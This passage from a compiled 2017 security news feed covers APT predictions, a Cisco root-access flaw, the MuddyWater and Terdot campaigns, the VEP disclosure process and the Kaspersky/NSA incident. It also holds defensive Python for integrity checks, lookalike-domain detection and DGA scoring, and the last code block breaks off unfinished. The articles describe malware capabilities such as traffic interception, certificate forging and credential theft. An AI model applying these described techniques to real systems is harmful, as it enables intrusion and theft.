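    """Parse 'hexdigest  relative/path' lines (the sha256sum output format)."""
    entries = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        digest, _, rel = line.partition("  ")
        entries[rel.strip()] = digest.lower()
    return entries


def verify_tree(root: str, manifest: Dict[str, str]) -> Dict[str, List[str]]:
    """Compare every file under root with the manifest.

    'modified' catches a Trojanized binary, 'unexpected' catches a dropped
    loader or extra library, 'missing' catches a stripped component.
    """
    report = {"ok": [], "modified": [], "missing": [], "unexpected": []}
    for rel, expected in manifest.items():
        path = os.path.join(root, *rel.split("/"))
        if not os.path.isfile(path):
            report["missing"].append(rel)
            continue
        bucket = "ok" if hmac.compare_digest(sha256_file(path), expected) else "modified"
        report[bucket].append(rel)
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            rel = os.path.relpath(os.path.join(dirpath, name), root).replace(os.sep, "/")
            if rel not in manifest:
                report["unexpected"].append(rel)
    for bucket in report.values():
        bucket.sort()
    return report


def _write(root: str, rel: str, data: bytes) -> None:
    path = os.path.join(root, *rel.split("/"))
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as fh:
        fh.write(data)


def demo() -> Tuple[Dict[str, List[str]], Dict[str, List[str]]]:
    """Constructed package: verify a clean install, then the same tree after a
    simulated Trojanized update (helper patched, extra loader dropped)."""
    root = tempfile.mkdtemp(prefix="pkg_")
    try:
        clean_files = {"bin/tool.exe": b"clean tool build", "lib/helper.dll": b"clean helper"}
        for rel, data in clean_files.items():
            _write(root, rel, data)
        # Reference manifest, as obtained out of band from the download channel
        manifest_text = "\n".join(
            f"{hashlib.sha256(data).hexdigest()}  {rel}" for rel, data in clean_files.items())
        manifest = parse_manifest(manifest_text)
        clean_report = verify_tree(root, manifest)

        _write(root, "lib/helper.dll", b"clean helper" + b"\x00injected stub")
        _write(root, "lib/loader.dll", b"dropped by update")
        tampered_report = verify_tree(root, manifest)
        return clean_report, tampered_report
    finally:
        shutil.rmtree(root)


if __name__ == "__main__":
    clean, tampered = demo()
    print("clean install:", clean)
    print("after tampered update:", tampered)
```

The value of this check depends entirely on where the reference hashes come from: when the vendor's own build pipeline is what was compromised, the hashes and signatures it publishes match the Trojanized build. A manifest taken from a previously vetted release, a second mirror, or your own golden image is what gives the comparison teeth, which is also why the text notes that C&C traffic is often the only visible tell.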

More high-end mobile malware. In August 2016, CitizenLab and Lookout published their analysis of the discovery of a sophisticated mobile espionage platform named Pegasus. Pegasus, a so-called ‘lawful interception’ software suite, is sold to governments and other entities by an Israeli company called NSO Group. When combined with zero-days capable of remotely bypassing a modern mobile operating system’s security defenses, such as those of iOS, this is a highly potent system against which there is little defense. In April 2017, Google published its analysis of the Android version of the Pegasus spyware, which it called Chrysaor. In addition to ‘lawful surveillance’ spyware such as Pegasus and Chrysaor, many other APT groups have developed their own mobile malware implants.
Because iOS is an operating system locked down from introspection, there is very little that a user can do to check whether their phone is infected. Despite Android’s greater exposure to vulnerabilities, the situation there is better, because products such as Kaspersky AntiVirus for Android are available to ascertain the integrity of a device.

Our assessment is that the total number of mobile malware samples existing in the wild is likely higher than currently reported, due to shortcomings in telemetry that make these more difficult to spot and eradicate. We estimate that in 2018 more high-end APT malware for mobile will be discovered, as a result of both an increase in the attacks and improvements in the security technologies designed to catch them.

More BeEF-like compromises with web profiling. Due to a combination of increased interest and better security and mitigation technologies being deployed by default in operating systems, the prices of zero-day exploits have skyrocketed through 2016 and 2017. For instance, the latest Zerodium payout chart lists up to $1,500,000 for a complete iPhone (iOS) Remote jailbreak with persistence attack, which is another way of saying ‘a remote infection without any interaction from the user’.

The incredible prices that some government customers have most certainly chosen to pay for these exploits mean there is increasing attention paid towards protecting these exploits from accidental disclosure. This translates into the implementation of a more solid reconnaissance phase before delivering the actual attack components. The reconnaissance phase can, for instance, emphasize the identification of the exact versions of the browser used by the target, their operating system, plugins and other third-party software. Armed with this knowledge, the threat actor can fine-tune their exploit delivery to a less sensitive ‘1-day’ or ‘N-day’ exploit, instead of using the crown jewels.

These profiling techniques have been used fairly consistently by APT groups like Turla and Sofacy, as well as Newsbeef (a.k.a. Newscaster, Ajax hacking team, or ‘Charming Kitten’), but also by other APT groups known for their custom profiling frameworks, such as the prolific Scanbox. Taking the prevalence of these frameworks into account, in combination with a surging need to protect expensive tools, we estimate the usage of profiling toolkits such as ‘BeEF’ will increase in 2018, with more groups adopting either public frameworks or developing their own.

Sophisticated UEFI and BIOS attacks. The Unified Extensible Firmware Interface (UEFI) is a software interface which serves as the intermediary between the firmware and the operating system on modern PCs. Established in 2005 by an alliance of leading software and hardware developers, Intel most notable amongst them, it’s now quickly superseding the legacy BIOS standard. This was achieved thanks to a number of advanced features that BIOS lacks: for example, the ability to install and run executables, networking and Internet capabilities, cryptography, CPU-independent architecture and drivers, etc. The very advanced capabilities that make UEFI such an attractive platform also open the way to new vulnerabilities that didn’t exist in the age of the more rigid BIOS. For example, the ability to run custom executable modules makes it possible to create malware that would be launched by UEFI directly before any anti-malware solution – or, indeed, the OS itself – had a chance to start.
The fact that commercial-grade UEFI malware exists has been known since 2015, when the Hacking Team UEFI modules were discovered. With that in mind, it is perhaps surprising that no significant UEFI malware has been found, a fact that we attribute to the difficulty of detecting it in a reliable way. We estimate that in 2018 we will see the discovery of more UEFI-based malware.

Destructive attacks continue. Beginning in November 2016, Kaspersky Lab observed a new wave of wiper attacks directed at multiple targets in the Middle East. The malware used in the new attacks was a variant of the infamous Shamoon worm that targeted Saudi Aramco and Rasgas back in 2012. Dormant for four years, one of the most mysterious wipers in history has returned. Also known as Disttrack, Shamoon is a highly destructive malware family that effectively wipes the victim machine. A group known as the ‘Cutting Sword of Justice’ took credit for the Saudi Aramco attack by posting a Pastebin message on the day of the attack (back in 2012), and justified the attack as a measure against the Saudi monarchy.
The Shamoon 2.0 attacks seen in November 2016 targeted organizations in various critical and economic sectors in Saudi Arabia. Just like the previous variant, the Shamoon 2.0 wiper aims for the mass destruction of systems inside compromised organizations. While investigating the Shamoon 2.0 attacks, Kaspersky Lab also discovered a previously unknown wiper malware that appears to be targeting organizations in Saudi Arabia. We’ve called this new wiper StoneDrill and have been able to link it with a high degree of confidence to the Newsbeef APT group.

In addition to Shamoon and StoneDrill, 2017 has been a tough year in terms of destructive attacks. The ExPetr/NotPetya attack, which was initially considered to be ransomware, turned out to be a cleverly camouflaged wiper as well. ExPetr was followed by other waves of ‘ransomware’ attacks in which there is little chance for the victims to recover their data; all were cleverly masked ‘wipers as ransomware’. One of the lesser known facts about ‘wipers as ransomware’ is perhaps that a wave of such attacks was observed in 2016 from the CloudAtlas APT, which leveraged what appeared to be ‘wipers as ransomware’ against financial institutions in Russia.

In 2018, we estimate that destructive attacks will continue to rise, leveraging their status as the most visible type of cyberwarfare.

More subversion of cryptography. In March 2017, IoT encryption scheme proposals developed by the NSA came into question with Simon and Speck variant ISO approvals being both withdrawn and delayed a second time.
In August 2016, Juniper Networks announced the discovery of two mysterious backdoors in their NetScreen firewalls. Perhaps the most interesting of the two was an extremely subtle change of the constants used for the Dual_EC random number generator, which would allow a knowledgeable attacker to decrypt VPN traffic from NetScreen devices. The original Dual_EC algorithm was designed by the NSA and pushed through NIST. Back in 2013, a Reuters report suggested that the NSA paid RSA $10 million to put the vulnerable algorithm in their products as a means of subverting encryption. Even though the theoretical possibility of a backdoor was identified as early as 2007, several companies (including Juniper) continued to use it with a different set of constants, which would make it theoretically secure. It appears that this different set of constants made some APT actor unhappy enough to merit hacking into Juniper and changing the constants to a set that they could control and leverage to decrypt VPN connections.

These attempts haven’t gone unnoticed. In September 2017, an international group of cryptography experts forced the NSA to back down on two new encryption algorithms which the organization was hoping to standardize.

In October 2017, news broke about a flaw in a cryptographic library used by Infineon in their hardware chips for the generation of RSA primes. While the flaw appears to have been unintentional, it leaves open the question of how secure the underlying encryption technologies used in our everyday life really are, from smart cards to wireless networks and encrypted web traffic. In 2018, we predict that more severe cryptographic vulnerabilities will be found and (hopefully) patched, be they in the standards themselves or in specific implementations.

Identity in e-commerce comes into crisis. The past few years have been punctuated by increasingly catastrophic large-scale breaches of personally identifiable information (PII). Latest among these is the Equifax breach, reportedly affecting 145.5 million Americans. While many have grown desensitized to the weight of these breaches, it’s important to understand that the release of PII at scale endangers a fundamental pillar of e-commerce and the bureaucratic convenience of adopting the Internet for important paperwork. Sure, fraud and identity theft have been problems for a long time, but what happens when the fundamental identifying information is so widely proliferated that it’s simply not reliable at all? Commerce and governmental institutions (particularly in the United States) will be faced with a choice between scaling back the modern comforts of adopting the Internet for operations or doubling down on the adoption of other multi-factor solutions. Perhaps thus far resilient alternatives like ApplePay will come into vogue as de facto means of ensuring identity and transactions, but in the meantime we may see a slowdown in the critical role of the Internet for modernizing tedious bureaucratic processes and cutting operational costs.
More router and modem hacks. Another known area of vulnerability that has gone vastly ignored is that of routers and modems. Be they home or enterprise, these pieces of hardware are everywhere, they’re critically important to daily operations, and tend to run proprietary pieces of software that go unpatched and unwatched. At the end of the day, these little computers are Internet-facing by design and thereby sitting at a critical juncture for an attacker intent on gaining persistent and stealthy access to a network. Moreover, as some very cool recent research has shown, in some cases attackers might even be able to impersonate different Internet users, making it possible to throw off the trail of an attacker entirely to a different connecting address. At a time of increased interest in misdirection and false flags, this is no small feat. Greater scrutiny of these devices will inevitably yield some interesting findings.
A medium for social chaos. Beyond the leaks and political drama of the past year’s newfound love for information warfare, social media itself has taken a politicized role beyond our wildest dreams. Whether it’s at the hand of political pundits or confusing comedic jabs at Facebook’s CEO by South Park’s writers, eyes have turned against the different social media giants, demanding some level of fact-checking and identification of fake users and bots attempting to exert disproportionate levels of social influence. Sadly, it’s becoming obvious that these networks (which base their success on quantified metrics like ‘daily active users’) have little incentive to truly purge their user base of bots, even when these bots are serving an obvious agenda or can be tracked and traced by independent researchers. We expect that, as the obvious abuse continues and large bot networks become accessible to wider swaths of politically unsavory characters, the greater backlash will be directed at the use of social media itself, with disgusted users eagerly looking for alternatives to the household giants that revel in the benefits of the abuse for profits and clicks.
APT predictions – conclusion
In 2017 we pronounced the death of Indicators of Compromise. In 2018, we expect to see advanced threat actors playing to their new strengths, honing their new tools and the terrifying angles described above. Each year’s themes and trends shouldn’t be taken in isolation – they build on each other to enrich an ever-growing landscape of threats facing users of all types, be it individuals, enterprise, or government. The only consistent reprieve from this onslaught is the sharing and knowledgeable application of high-fidelity threat intelligence.

While these predictions cover trends for advanced targeted threats, individual industry sectors will face their own distinct challenges. In 2018, we wanted to shine the spotlight on some of those as well – and have prepared predictions for the connected healthcare, automotive, financial services, and industrial security sectors, as well as cryptocurrencies. You can find them all here!

Cisco issued a security advisory warning of a flaw in Cisco Voice Operating System software
16.11.2017 securityaffairs

Cisco issued a security advisory warning of a vulnerability in Cisco Voice Operating System software platform that affects at least 12 products.
The tech giant Cisco issued a security advisory warning of a vulnerability in Cisco Voice Operating System software platform that could be triggered by an unauthenticated, remote hacker to gain unauthorized and elevated access to vulnerable devices.

The flaw in the Cisco Voice Operating System software platform, tracked as CVE-2017-12337, was rated as Critical.

“A vulnerability in the upgrade mechanism of Cisco collaboration products based on the Cisco Voice Operating System software platform could allow an unauthenticated, remote attacker to gain unauthorized, elevated access to an affected device.” reads the Cisco Security Bulletin.

“The vulnerability occurs when a refresh upgrade or Prime Collaboration Deployment (PCD) migration is performed on an affected device. When a refresh upgrade or PCD migration is completed successfully, an engineering flag remains enabled and could allow root access to the device with a known password.”

The US-CERT issued an alert related to the flaw, encouraging users and administrators to review the advisory and apply the necessary update.


A remote attacker that manages to access the vulnerable devices over SSH File Transfer Protocol (SFTP) could gain root access. Twelve products are affected by the vulnerability, including Cisco Prime License Manager, Cisco SocialMiner, Cisco Emergency Responder and Cisco MediaSense.

“An attacker who can access an affected device over SFTP while it is in a vulnerable state could gain root access to the device. This access could allow the attacker to compromise the affected system completely.” continues the security bulletin.

The vulnerability could be fixed by upgrading the device using the standard upgrade method to an Engineering Special Release, service update, or a new major release of the affected product.

“If the vulnerable device is subsequently upgraded using the standard upgrade method to an Engineering Special Release, service update, or a new major release of the affected product, this vulnerability is remediated by that action,” said Cisco.

Cisco highlighted that Engineering Special Releases that are installed as COP files do not fix this vulnerability.

Middle East 'MuddyWater' Attacks Difficult to Clear Up
16.11.2017 securityweek
Long-lasting targeted attacks aimed at entities in the Middle East are difficult to attribute despite being analyzed by several researchers, Palo Alto Networks said this week.

Dubbed “MuddyWater” by the security firm because of the high level of confusion they have already created, the attacks took place between February and October 2017. The campaign has made use of a variety of malicious documents, and hit targets in Saudi Arabia, Iraq, Israel, United Arab Emirates, Georgia, India, Pakistan, Turkey, and the United States to date.

The attacks, researchers say, use a slowly evolving PowerShell-based first-stage backdoor named POWERSTATS. The activity related to this threat actor continues despite existing reports, with the only observed changes being related to tools and techniques.

The malicious documents used in these attacks are almost identical to those in recently observed incidents targeting the Saudi Arabian government. Those documents were similar to files previously associated with a series of fileless assaults that Morphisec linked to a single attack framework. Some of these attacks were attributed to the hacking group known as FIN7.

According to a new Palo Alto Networks report, the attacks might have been mistakenly associated with the FIN7 group. A command and control (C&C) server delivering the FIN7-linked DNSMessenger tool was said to have been employed by MuddyWater as well, but there’s no evidence that the latter group ever used the utility, the researchers claim.

Between February and October, the malicious documents associated with the group’s activity had been tailored according to the target regions. They often used the logos of branches of local government in an attempt to trick users into enabling malicious macros.

The delivery method might have changed between attacks, but the final payload remained the same non-public PowerShell backdoor mentioned above. Moreover, the malicious documents used in this campaign shared the same C&C infrastructure and featured similar attributes.

“Based on these connections we can be confident that all the files and infrastructure […] are related, since more than one of these can be used to link each of the samples discussed in each case,” Palo Alto notes. The researchers also published lists of C&C servers, compromised sites, and related files.

Tools used by the group have been well documented in previous reports, including open-source utilities such as Meterpreter, Mimikatz, LaZagne, Invoke-Obfuscation, and more. In some recent attacks, GitHub is used as a hosting site for the POWERSTATS custom backdoor, as the actor controls multiple GitHub repositories, the researchers say.

MuddyWater even compromised accounts at third-party organizations to send their malware. As part of an attack, the malicious document used was nearly identical to a legitimate attachment that the same recipient received later.

“This indicates that the attackers stole and modified a legitimate document from the compromised user account, crafted a malicious decoy Word macro document using this stolen document and sent it to the target recipient who might be expecting the email from the original account user before the real sender had time to send it,” the researchers explain.

According to Palo Alto Networks, the reports previously associating this cluster of activity with FIN7 created confusion rather than clarity. The FIN7 group is financially motivated and targets organizations in the restaurant, services and financial sectors, which suggests that the threat actor is unlikely to be tied to espionage-focused attacks in the Middle East.

Malware associated with FIN7 hasn’t been observed in MuddyWater attacks, and the researchers also claim that there might be a mistake in the report linking the attacks to FIN7. However, they also admit that the hackers might have planted a false flag when realizing they were under investigation.

“Whilst we could conclude with confidence that the attacks discussed in this article are not FIN7 related, we were not able to answer many of our questions about the MuddyWater attacks. We are currently unable to make a firm conclusion about the origin of the attackers, or the specific types of information they seek out once on a network,” the security researchers say.

White House Cyber Chief Provides Transparency Into Zero-Day Disclosure Process
16.11.2017 securityweek BigBrothers
Government Vulnerability Disclosure Process (VEP)

The U.S. government Wednesday introduced greater transparency into its Vulnerabilities Equities Policy (VEP) program. This is the process by which government agencies decide whether to disclose or stockpile the cyber vulnerabilities they discover.

In a lengthy statement, White House Cybersecurity Coordinator Rob Joyce explained why not all discoveries are disclosed. That will not change; but in introducing greater transparency into the process of decision-making, he hopes "to demonstrate to the American people that the Federal Government is carefully weighing the risks and benefits as we carry out this important mission."

The extent to which the government agencies use cyber vulnerabilities to further their own overseas missions became known with Edward Snowden's leaked documents. This sparked greater discussion over the morality of government collection and use of vulnerabilities without disclosing the existence of those vulnerabilities to the product vendors concerned.

Microsoft, for example, developed detailed proposals for introducing international norms of cyber behavior that would rely on no government keeping private supplies (hoarding) of undisclosed 0-day vulnerabilities; and also called for a digital Geneva Convention that would "mandate that governments report vulnerabilities to vendors rather than stockpile, sell or exploit them." This is unlikely to happen. "Our national capacity to find and hold criminals and other rogue actors accountable relies on cyber capabilities enabled by exploiting vulnerabilities in the digital infrastructure they use. Those exploits produce intelligence for attribution, evidence of crimes, enable defensive investigations, and posture us to respond to our adversaries with cyber capabilities," said Joyce in his statement.

The theft and release of 'Equation Group' (generally considered to be the NSA) tools and exploits by the Shadow Brokers (generally considered to be 'Russia') brought new emphasis to the issue. These tools included the EternalBlue exploit soon used by hackers (quite probably nation-state affiliated hackers) in the worldwide WannaCry and NotPetya ransomware outbreaks.

Joyce formerly served as head of the NSA’s Tailored Access Operations (TAO) unit—an offensive hacking team tasked with breaking into systems of foreign entities.

The unproven implication is that if the NSA had disclosed their vulnerabilities, the worldwide disruption caused by WannaCry and NotPetya might not have happened. There is, however, little mention of the danger of theft inherent in any store of vulnerabilities in this week's VEP transparency announcement, beyond two considerations in the decision process: "If USG knowledge of this vulnerability were to be revealed, what risks could that pose for USG relationships with industry?", and "If USG knowledge of this vulnerability were to be revealed, what risks could that pose for USG international relations?"

The full unclassified VEP process document (PDF) "describes the Vulnerabilities Equities Policy and Process for departments and agencies of the United States Government (USG) to balance equities and make determinations regarding disclosure or restriction when the USG obtains knowledge of newly discovered and not publicly known vulnerabilities in information systems and technologies."

In short, it explains the process without altering the policy. Its purpose is to introduce transparency and reassure the public that the government will weigh the offensive advantages obtained against the threat of public disruption if the vulnerability is used by third parties, for each 0-day vulnerability it discovers.

That transparency is valuable, but there remain numerous concerns. One is that the VEP continues to be an administrative exercise not enshrined in law. It can be changed at any time without public or legislative oversight.

In May 2017, Senators Brian Schatz (D-Hawaii), Ron Johnson (R-Wis.), and Cory Gardner (R-Colo.) and U.S. Representatives Ted Lieu (D-Calif.) and Blake Farenthold (R-Texas) introduced the 'Protecting Our Ability to Counter Hacking Act of 2017' -- the PATCH Act.

Its purpose is to promote the transparency introduced this week, but make it a legal requirement rather than an administrative choice. The PATCH Act appears to have stalled, with no real progress since its introduction in May.

Other concerns appear in the Exceptions section of the VEP process document. For example, "The United States Government's decision to disclose or restrict vulnerability information could be subject to restrictions by partner agreements and sensitive operations." This will exclude 0-days discovered by, say, GCHQ and disclosed to the NSA under an effective non-disclosure agreement; and it could also exclude 0-days expected to be used in potential operations (such as Stuxnet).

It has long been suspected that members of the Five Eyes surveillance alliance share intelligence on each other's nationals to circumvent individual laws forbidding surveillance of their own subjects. If this happens in practice, a similar arrangement between each member's intelligence agencies would exclude shared vulnerabilities from the VEP process. Both exclusions will undoubtedly be used by the more offense-driven agencies (the NSA and the CIA) to both hold and keep secret their most 'valuable' exploits.

Nevertheless, the purpose of declassifying the VEP process is primarily to reassure the American people that the secretive intelligence agencies do not have free rein in the vulnerabilities they keep and the vulnerabilities they use -- and to that extent it will probably succeed.

'Fake news' Becomes a Business Model: Researchers
16.11.2017 securityweek CyberCrime
Cyber criminals have latched onto the notion of "fake news" and turned it into a profitable business model, with services starting at under $10, security researchers said Thursday.

The online security firm Digital Shadows released a report highlighting services aimed at creating bogus media websites, fake reviews and social media "bots" or automated accounts to promote or denigrate commercial products and services.

One of the methods used is creating bogus or "spoofed" media websites designed to look like those of legitimate news organizations. The researchers uncovered some 2,800 "live spoof" sites.

This can be done by changing a single letter in a web address to create a fake "clone" of a legitimate news organization site.
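Spoofed sites of the kind described above can be caught on the defender's side with a lookalike-domain check. The following is an added example, not code from the Digital Shadows report or this article: it flags observed hostnames that sit within one edit (substitution, insertion, deletion or adjacent swap) of a known legitimate news domain, or that reuse its label under a different top-level domain. All domain names in it are constructed for illustration.

```python
from typing import Iterable, List, Tuple

# Constructed list of legitimate domains to protect (not real news sites).
LEGITIMATE_DOMAINS = ["examplenews.com", "dailyexample.org"]


def damerau_distance(a: str, b: str) -> int:
    """Optimal string alignment distance: the minimum number of single-character
    inserts, deletes, substitutions or adjacent transpositions turning a into b."""
    rows, cols = len(a) + 1, len(b) + 1
    d = [[0] * cols for _ in range(rows)]
    for i in range(rows):
        d[i][0] = i
    for j in range(cols):
        d[0][j] = j
    for i in range(1, rows):
        for j in range(1, cols):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(
                d[i - 1][j] + 1,        # deletion
                d[i][j - 1] + 1,        # insertion
                d[i - 1][j - 1] + cost,  # substitution (or match)
            )
            # Adjacent transposition, e.g. "exampel" for "example".
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[rows - 1][cols - 1]


def normalize_host(value: str) -> str:
    """Reduce a URL or hostname to a lowercase host without scheme, path, port
    or a leading 'www.', so that variants of the same site compare equal."""
    host = value.lower().split("://")[-1].split("/")[0].split(":")[0]
    return host[4:] if host.startswith("www.") else host


def find_lookalikes(
    observed: Iterable[str],
    legit: Iterable[str] = LEGITIMATE_DOMAINS,
    max_dist: int = 1,
) -> List[Tuple[str, str, int]]:
    """Return (observed_value, legitimate_domain, distance) for every observed
    host that is not itself a legitimate domain but is within max_dist edits of
    one, or shares its first label under a different TLD (e.g. .net for .com)."""
    legit_hosts = {normalize_host(l) for l in legit}
    hits = []
    for raw in observed:
        host = normalize_host(raw)
        if host in legit_hosts:
            continue  # exact match: the genuine site, nothing to flag
        for good in sorted(legit_hosts):
            dist = damerau_distance(host, good)
            same_label = host.split(".")[0] == good.split(".")[0]
            if dist <= max_dist or same_label:
                hits.append((raw, good, dist))
    return hits


if __name__ == "__main__":
    # Constructed sample of hostnames as they might appear in proxy or DNS logs.
    sample = ["www.examplenews.com", "exanplenews.com",
              "examplenews.co", "examplenews.net", "unrelated.org"]
    for raw, good, dist in find_lookalikes(sample):
        print(f"possible spoof of {good}: {raw} (edit distance {dist})")
```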

Some criminals use the same methods as Russia-based propagandists -- modifying legitimate documents and leaking them as part of disinformation campaigns, the report said.

"Like any good news story, content will be shared, liked, reposted and distributed across many different platforms and channels," the report said.

"The more widely a piece of disinformation can be spread, the better the chances of it capturing the public imagination and achieving its objective -- whether that is to discredit an opponent, sow discord or to generate profit."

While the use of these tools in political campaigns has become a growing concern, the same methods can be used for profit, according to the report.

"The sheer availability of tools means that barriers to entry are lower than ever," said Rick Holland, vice president of strategy at Digital Shadows.

"It means this now extends beyond geopolitical to financial interests that affect businesses and consumers."

Holland said "tool kits" are available on a trial basis for as little as $7 to control the activities of social media bots.

Retailers are also a target, with one service offering Amazon ranking, reviews, votes, listing optimization and selling promotions at prices from $5 for an unverified review to $500 for a monthly retainer.

Still other services tout the merits of crypto-currencies to push up the price, similar to stock "pump and dump" scams, the report said.

Many of these services are advertised on the anonymous "dark web" where users are difficult to trace, according to Holland.

But some are openly advertised as marketing tools as well, he said.

Holland said misinformation has been around for a long time but that "what has changed in the digital world is the speed such techniques spread around the world."

Kaspersky Shares More Details on NSA Incident
16.11.2017 securityweek  BigBrothers
Kaspersky Lab on Thursday shared more details from its investigation into reports claiming that Russian hackers stole data belonging to the U.S. National Security Agency (NSA) by exploiting the company’s software.

The Wall Street Journal reported last month that hackers working for the Russian government stole information on how the U.S. penetrates foreign networks and how it defends against cyberattacks. The files were allegedly taken in 2015 from the personal computer of an NSA contractor who had been using a security product from Kaspersky Lab.

The WSJ article suggested that Kaspersky either knowingly helped the Russian government obtain the files or that the hackers exploited vulnerabilities in the company’s software without the firm’s involvement.

In a preliminary report, Kaspersky said the incident referenced in the WSJ article likely took place in 2014, when the company was investigating malware used by the Equation Group, a threat actor later associated with the NSA.

In a more technical report published on Thursday, Kaspersky said the incident likely occurred between September 11, 2014 and November 17, 2014 – the security firm believes WSJ’s source may have mixed up the dates.

In September 2014, Kaspersky’s products detected malware associated with the Equation Group on a device with an IP address pointing to the Baltimore area in Maryland. It’s worth noting that the NSA headquarters are in Fort Meade, Maryland, less than 20 miles from the city of Baltimore.

The Kaspersky product present on the device automatically sent an archive containing the suspected malware files back to the company’s systems for further analysis. The archive contained source code for Equation malware, along with four documents bearing classification markings (e.g. secret, confidential).

The Kaspersky analyst who found the archive informed the company’s CEO of its content and the decision was made to remove the files from its storage systems.

So is it possible that the classified files were somehow obtained by Russian actors from Kaspersky’s systems? The firm denies spying for the Russian government and claims the data was removed from its systems – only some statistics and metadata remain – but it cannot guarantee that its employees handled the data appropriately.

“We cannot assess whether the data was ‘handled appropriately’ (according to US Government norms) since our analysts have not been trained on handling US classified information, nor are they under any legal obligation to do so,” the company said.

While Kaspersky admitted that its systems were breached in 2015 by a threat group linked to Israeli intelligence, the company said it found no evidence that the NSA files left its systems.

As for the assumption that Kaspersky’s products may have been specifically configured to look for secret files on the systems they were installed on, the company said all the signatures for retrieving files from a user’s device are carefully handled and verified by an experienced developer, and there is no evidence that anyone created a signature for files marked “secret” during the Equation investigation.

The company determined that an analyst did create a signature for files with names that included the string “secret,” but it was for a piece of malware associated with the TeamSpy espionage campaign. The signature included a path specific to that malware in order to avoid false positives.

Another possible scenario is related to the fact that the device of the NSA contractor got infected with malware after the Kaspersky antivirus was disabled. The security product was temporarily disabled when the user attempted to install a pirated copy of Microsoft Office using a known activation tool.

After the antivirus was re-enabled, Kaspersky detected 121 threats on the system. The malware associated with the Office activation tool was Smoke Bot (aka Smoke Loader), which had been sold on Russian underground forums since 2011. At the time of the incident, the malware communicated with servers apparently set up by an individual located in China.

Kaspersky says it’s also possible that the contractor’s computer may have been infected with stealthy malware from a sophisticated threat actor that was not detected at the time.

Several recent media reports focused on Kaspersky’s alleged connection to the Kremlin, which has led to many U.S. officials raising concerns regarding the use of the company’s products. As a result, the Department of Homeland Security (DHS) has ordered all government agencies to identify and remove the firm’s products, despite the apparent lack of evidence supporting the claims.

In an effort to clear its name, Kaspersky announced the launch of a new transparency initiative that involves giving partners access to source code and paying significantly larger bug bounties for vulnerabilities found in the firm’s products.

Terdot Banking Trojan Could Act as Cyber-Espionage Tool
16.11.2017 securityweek BigBrothers
The Terdot banking Trojan packs information-stealing capabilities that could easily turn it into a cyber-espionage tool, Bitdefender says in a new report.

Highly customized and sophisticated, Terdot is based on the source code of ZeuS, which leaked online in 2011. The banking Trojan resurfaced in October last year and Bitdefender has been tracking its whereabouts ever since, the security company notes in a technical paper (PDF).

Terdot was designed to operate as a proxy to perform man-in-the-middle (MitM) attacks, as well as to steal browser information such as login credentials or the stored credit card data. Furthermore, the malware is capable of injecting HTML code into visited web pages.

The malware relies more on legitimate applications for its nefarious purposes, including certificate injection tools, than on in-house developed software.

Although designed as a banking Trojan, Terdot’s capabilities go well beyond its primary purpose, Bitdefender notes. The threat can eavesdrop and modify traffic on social media and email platforms, and also packs automatic update features that allow it to download and execute any file provided by the operator.

This malware family mainly focuses on targeting Canadian institutions from the banking sector, but the analyzed samples would also target email service providers such as Microsoft’s live.com, Yahoo Mail, and Gmail. It also targets social networks such as Facebook, Twitter, Google Plus, and YouTube. According to Bitdefender, the malware avoids gathering data related to vk.com, the largest social platform in Russia.

The main distribution channel for the Trojan is the Sundown exploit kit, but Terdot was also observed spreading via malicious emails containing a button masquerading behind a PDF icon. When clicked on, it would execute obfuscated JavaScript code to download and run the malware file.

A complex chain of droppers, injections, and downloaders is used to deliver Terdot and third-party utilities employed by the threat, in an attempt to trick defenses and hinder analysis.

After infection, the malware injects itself into the browser process by hooking very low-level network socket operations to redirect connections to its own proxy and read traffic (which also allows it to alter traffic). Terdot can steal authentication data either by inspecting the client’s requests or by injecting spyware JavaScript code into the response.

The malware can also bypass secure connections by generating certificates for each of the domains the victim visits.

Terdot’s components are split across numerous processes, each with a specific role. Long-running Windows processes such as Windows Explorer, for example, are used either for injection purposes to spread the infection inside the machine or as watchdogs, to hinder disinfection. The malware uses the msiexec.exe process for running its MitM proxy.

In their technical analysis of the threat, Bitdefender’s security researchers explain that, after installation and initial handshake with the command and control server, the malware downloads updates and commands from the same URL it sends system information to (including a unique identifier, malware version, CRC32s of downloaded data, Windows version, processor architecture, system language, and network adapter IP).

The bot supports a wide range of commands: it can uninstall itself, run a specified file, execute a simple GET request, add or remove URLs to/from a list that signals the proxy to disable injections for them, and add or remove URLs to/from a blocking list. The malware also features a Domain Generation Algorithm (DGA).
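The report does not describe Terdot’s DGA, so the following is an added, generic example (not Bitdefender’s code and not Terdot-specific) of the kind of heuristic a defender can run over proxy or DNS logs to surface algorithmically generated domains: labels that are long and high-entropy, nearly vowel-free, or made of long consonant/digit runs. The log lines, hosts and thresholds are all constructed for illustration; the registrable-label extraction is deliberately naive (it ignores multi-part public suffixes such as co.uk).

```python
import math
from typing import Dict, List

VOWELS = set("aeiou")

# Constructed proxy log lines: timestamp, client IP, requested host.
# None of these hosts come from the Terdot report.
SAMPLE_LOG = """\
2017-11-16T10:01:02Z 10.0.0.12 www.example-bank.ca
2017-11-16T10:01:05Z 10.0.0.12 mail.google.com
2017-11-16T10:01:09Z 10.0.0.12 xk3fq9zlw2r7bvm.com
2017-11-16T10:01:14Z 10.0.0.12 q8z2m1vjt5ypx.net
2017-11-16T10:01:20Z 10.0.0.12 cdn.twitter.com
2017-11-16T10:01:25Z 10.0.0.12 www.microsoft.com
"""


def shannon_entropy(s: str) -> float:
    """Bits per character of a label; random-looking labels score high."""
    if not s:
        return 0.0
    counts: Dict[str, int] = {}
    for ch in s:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def longest_non_vowel_run(s: str) -> int:
    """Length of the longest run of consonants/digits (DGA labels tend to have long ones)."""
    best = run = 0
    for ch in s:
        run = 0 if ch in VOWELS else run + 1
        best = max(best, run)
    return best


def label_features(label: str) -> Dict[str, float]:
    letters = [ch for ch in label if ch.isalpha()]
    vowel_ratio = (sum(ch in VOWELS for ch in letters) / len(letters)) if letters else 0.0
    return {
        "length": len(label),
        "entropy": round(shannon_entropy(label), 3),
        "vowel_ratio": round(vowel_ratio, 3),
        "non_vowel_run": longest_non_vowel_run(label.replace("-", "")),
    }


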